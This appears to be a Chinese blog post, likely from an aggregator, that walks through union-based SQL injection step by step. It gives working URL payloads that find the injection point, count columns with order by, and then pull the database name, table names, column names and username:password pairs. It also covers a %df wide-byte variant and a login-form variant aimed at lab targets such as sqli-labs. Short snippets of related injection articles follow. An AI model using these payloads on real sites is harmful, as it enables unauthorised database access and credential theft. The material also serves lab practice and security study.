union聯合注入

2022-06-20 03:15:07 字數 3127 閱讀 7749

方式一

首先嘗試id=1

'and 1=1-- - 或者id=1" and 1=1-- - 或者1") and 1=1-- - 或者 1 and 1=1-- -(-- -注釋符,#,/* */)

假如是id=1

'and 1=1-- - 那麼and 1=1 就是我們可控的點 接下來在這個位置進行替換就好

?id=1' order by 4-- - 判斷字段個數,從order by 1 開始嘗試

?id=-1' union select 1,2,3,4-- - (讓id查詢不到 顯示我們的union select的值 且union select 後的數字遵循order by 判斷的值)

?id=-1 union select 1,database(),3,4-- - (查詢當前資料庫)

?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()-- - (注入出表名)

?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="stormgroup_member"-- -(注入出列名,""中需要注入的列名稱)

?id=-1 union select 1,group_concat(name,0x3a,password),3,4 from stormgroup_member-- -(注入出字段值,from後接的是上步注入的列)

方式二

?id=1%df』(測試是否存在注入,報錯則存在)

?id=1%df』-- -(注釋後面多餘的』limit 0,1

頁面正常)

?id=1%df』order by n-- -(order測試字段長度,報錯則說明超出最大長度)

?id=-1%df』union select

1,2,3-- -

?id=-1%df』union select

1,2,database()-- -(在頁面回顯出當前的資料庫名字)

?id=-1%df』union select

1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -(爆出當前資料庫的所有表)

?id=-1%df'

union select 1,2,group_concat(column_name) from information_schema.columns where table_name=

'users'

-- -(爆出目標表的列名)

?id=-1%df'

union select 1,2,group_concat(username,0x3a,password) from users-- -(爆出目標列的欄位名字)

首先嘗試id=1

'and 1=1-- - 或者id=1" and 1=1-- - 或者1") and 1=1-- - 或者 1 and 1=1-- -

假如是id=1

'and 1=1-- - 那麼and 1=1 就是我們可控的點 接下來在這個位置進行替換就好

?username=1'order by 3-- -&password=1 判斷字段個數

讓id查詢不到 顯示我們的union select的值 且union

select

後的數字遵循order by 判斷的值

p?username=1' union select 1,2,3-- -&password=1

查詢當前資料庫

?username=1' union select 1,database(),3-- -&password=1

?username=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -&password=1(注入出表名)

?username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="l0ve1ysq1"-- -&password=1(注入出列名)

?username=1' union select 1,group_concat(username,0x3a,password),3 from l0ve1ysq1-- -&password=1(注入出字段值)

' or '1'='1'#1、初始介面

3、有username、password出現

讓id查詢不到 顯示我們的union select的值 且union 

select

後的數字遵循order by 判斷的值

sql注入 union聯合查詢注入

目錄 一,sql注入必記的一庫三表 二,union聯合查詢注入 1,基本注入流程 1,判斷注入點 2,判斷多少列 3,判斷顯示位 4,顯示資料庫的基本資訊 5,顯示有哪些資料庫 6,顯示資料庫下有哪些表 7,判斷表裡有哪些字段 八,查詢資料表中有哪些資料 information schema 資料庫...

簡單聯合union查詢注入

聯合查詢有前提 必須有顯示位 用sql labs來學習 這是第乙個 一 判斷是否用 做字串引號 and 1 1 正常輸出 出錯代表沒有閉合 說明沒有用 可能沒有用 或用了 或 則是 字串注入 二 判斷它所在的資料庫有幾列 order by 3 判斷是否有3列 正常 order by 4 判斷是否有4...

基於錯誤的SQL注入(union聯合注入)

mysql中比較常用的一些函式 version 查詢資料庫的版本 user 查詢資料庫的使用者 database 資料庫 system user 系統使用者名稱 session user 連線資料庫的使用者名稱 current user 當前使用者名稱 load file 讀取本地檔案 datadi...